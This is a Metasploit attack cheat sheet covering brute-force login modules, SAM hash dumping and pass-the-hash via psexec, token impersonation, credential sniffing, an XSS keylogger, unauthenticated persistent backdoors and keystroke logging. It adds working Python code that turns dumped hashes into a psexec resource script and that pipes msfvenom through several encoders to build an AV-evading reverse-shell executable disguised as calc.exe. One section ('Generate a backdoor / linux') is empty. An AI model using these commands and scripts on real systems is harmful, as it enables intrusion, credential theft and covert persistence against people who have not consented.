1. Password security
search mysql_login ssh_login (the auxiliary/scanner/mysql/mysql_login and auxiliary/scanner/ssh/ssh_login brute-force modules; set RHOSTS plus USER_FILE/PASS_FILE and run)
2. Pass-the-hash
hashdump (dump the local SAM as user:rid:LM:NT:::; the LM:NT pair can be reused directly as SMBPass in exploit/windows/smb/psexec without cracking it)
3. Privilege escalation
getsystem (Meterpreter's built-in local escalation via named-pipe impersonation and token duplication; it is not a kernel exploit, for those run post/multi/recon/local_exploit_suggester first)
4. Generate a backdoor
linux:
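The hashdump output from step 2 above, parsed into values ready for pass-the-hash, as an added example that is not part of the original notes or of Metasploit itself. The sample hashdump lines are constructed (the hex values are arbitrary, not real hashes); the RHOSTS value and the CORP domain in the usage are assumptions. The two sentinel hashes (the "no LM hash stored" value and the NT hash of the empty password) are the well-known constants.

```python
"""Parse Meterpreter `hashdump` output and prepare pass-the-hash values.

Added example, not part of the original notes. The sample lines below are
constructed, not taken from a real host.
"""
import re

# Well-known sentinel values: the LM field of an account with no LM hash
# stored, and the NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# hashdump line format: user:rid:lmhash:nthash:::
HASHDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample output (hash values are arbitrary hex, not real hashes).
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
[+] this line is console noise and must be ignored
"""


def parse_hashdump(text):
    """Return one dict per well-formed line; anything else is skipped."""
    entries = []
    for line in text.splitlines():
        m = HASHDUMP_RE.match(line.strip())
        if not m:
            continue
        lm, nt = m["lm"].lower(), m["nt"].lower()
        entries.append({
            "user": m["user"],
            "rid": int(m["rid"]),
            "lm": lm,
            "nt": nt,
            "smbpass": f"{lm}:{nt}",          # exactly what psexec's SMBPass expects
            "lm_stored": lm != EMPTY_LM,     # a real LM hash means a weak, crackable password
            "empty_password": nt == EMPTY_NT,
        })
    return entries


def psexec_resource_script(entries, rhosts, domain="."):
    """Build an msfconsole resource script that tries each usable hash
    against exploit/windows/smb/psexec. Accounts with an empty password are
    skipped; they are almost always disabled and would only add noise."""
    lines = [
        "use exploit/windows/smb/psexec",
        f"set RHOSTS {rhosts}",
        f"set SMBDomain {domain}",
    ]
    for e in entries:
        if e["empty_password"]:
            continue
        lines += [f"set SMBUser {e['user']}", f"set SMBPass {e['smbpass']}", "run"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Assumed target address and domain; replace with the real ones.
    found = parse_hashdump(SAMPLE)
    for e in found:
        flag = ("EMPTY PASSWORD" if e["empty_password"]
                else "LM stored" if e["lm_stored"] else "NT only")
        print(f"{e['user']:<16} rid={e['rid']:<5} {flag}")
    print(psexec_resource_script(found, "10.0.0.5", domain="CORP"))
```

Save the printed script as pth.rc and load it with `msfconsole -r pth.rc`; an account whose LM field is a real hash is also worth cracking, since an LM hash means the password is at most 14 characters and case-insensitive.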
Intranet penetration
1. run get_local_subnets: list the compromised host's interfaces and subnets, then scan those segments (add a route through the session with run autoroute -s <subnet> so the auxiliary/scanner modules can reach them)
2. load incognito (older versions: use incognito): load the token impersonation extension
3. list_tokens -u: list the user tokens present on the host and look for a domain administrator
4. impersonate_token DOMAIN\\admin: take on the domain administrator's token (escape the backslash or quote the name)
5. shell: the shell now runs under the impersonated identity
6. If no domain administrator token is present on the host, fall back to sniffing
7. use auxiliary/sniffer/psnuffle: run the passive sniffer module (it captures plaintext credentials from protocols such as FTP and POP3, but only from traffic visible on the attacker's own interface)
VI. AV evasion
1. Try chaining several encoders:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port> ...
Here pipes are used so that msfvenom encodes the payload several times: first 20 iterations of shikata_ga_nai, then 10 iterations of alpha_upper, then 10 iterations of countdown, and finally an executable is generated using calc.exe as the template. Encoding only transforms the payload bytes; the decoder stub it prepends is itself well known to AV engines, so expect at best a short-lived gain.
2. Pack the backdoor generated above with UPX
upx Shell.exe
(UPX is trivially unpacked and a UPX-packed binary is itself flagged by many engines; packing is no substitute for a custom loader.)
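The three-stage encoder chain described above, written out as an added Python wrapper so the pipeline structure is explicit. This is example code, not the page's own command and not part of Metasploit; the msfvenom flags it uses (-p, -f raw, -e, -i, -a, --platform, -x, -o, -k) are the ones listed in the option table further down. The template name calc.exe and the output name payload.exe are assumptions, as are the LHOST/LPORT values in the usage.

```python
"""Chain several msfvenom encoders through pipes.

Added example, not from the original notes. It reproduces the three-stage
chain described in the text (shikata_ga_nai x20, alpha_upper x10,
countdown x10, calc.exe as template). Template and output filenames are
assumptions.
"""
import shutil
import subprocess


def encoder_chain(lhost, lport, template="calc.exe", out="payload.exe",
                  payload="windows/meterpreter/reverse_tcp", keep=False):
    """Return the argv of each pipeline stage.

    Stage 1 generates raw shellcode; every later stage reads raw shellcode
    on stdin (msfvenom does so when no -p is given), re-encodes it and emits
    raw again, and the last stage wraps the result in the template
    executable. The encoders are x86, so the payload must be x86 as well.
    """
    stages = [
        ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
         "-f", "raw", "-e", "x86/shikata_ga_nai", "-i", "20"],
        ["msfvenom", "-a", "x86", "--platform", "windows",
         "-e", "x86/alpha_upper", "-i", "10", "-f", "raw"],
        ["msfvenom", "-a", "x86", "--platform", "windows",
         "-e", "x86/countdown", "-i", "10", "-f", "exe",
         "-x", template, "-o", out],
    ]
    if keep:
        # -k keeps the template's own behaviour and runs the payload in a
        # new thread; without it calc.exe is only a shell around the payload
        # and no calculator ever appears, which a user may notice.
        stages[-1].append("-k")
    return stages


def as_shell(stages):
    """Render the stages as the one-liner you would paste into a shell."""
    return " | ".join(" ".join(argv) for argv in stages)


def run_chain(stages):
    """Execute the stages with real pipes; returns each stage's exit code."""
    if shutil.which("msfvenom") is None:
        raise RuntimeError("msfvenom is not on PATH")
    procs = []
    upstream = None
    for argv in stages:
        p = subprocess.Popen(argv, stdin=upstream, stdout=subprocess.PIPE)
        if upstream is not None:
            upstream.close()   # so SIGPIPE reaches the writer if a reader dies
        upstream = p.stdout
        procs.append(p)
    procs[-1].communicate()    # last stage writes the file; drain its stdout
    return [p.wait() for p in procs]


if __name__ == "__main__":
    # Assumed listener address and port.
    chain = encoder_chain("192.0.2.10", 4444)
    print(as_shell(chain))
    try:
        print("exit codes:", run_chain(chain))
    except RuntimeError as err:
        print(err)
```

A non-zero exit code from a middle stage usually means the encoded blob grew past what the next encoder accepts; lower -i on the earlier stage or set -s on the later one.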
VII. Fun with XSS
1. search keylogger (auxiliary/server/capture/http_javascript_keylogger)
2. set DEMO true (serves a demo page that loads the keylogging JavaScript)
3. set URIPATH /
4. set SRVPORT 80
5. run
Whatever a victim types into a page that includes the served script is posted back to this server; in a real XSS the script URL is injected into the vulnerable page instead of using the demo page.
VIII. Maintaining access
1. Prerequisite: an existing Meterpreter session
2. run metsvc -A: install the Meterpreter service as a persistent backdoor (it listens on TCP 31337 with no authentication, so anyone who reaches that port gets the session; the metsvc script is legacy, recent versions offer exploit/windows/local/persistence and post/windows/manage/persistence_exe instead)
3. exploit(handler) > set payload windows/metsvc_bind_tcp (to reconnect later; set RHOST to the target and LPORT to 31337)
4. show options
5. keyscan_start: start the keylogger
6. keyscan_dump: view the captured keystrokes
msfvenom options (from msfvenom -h):
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)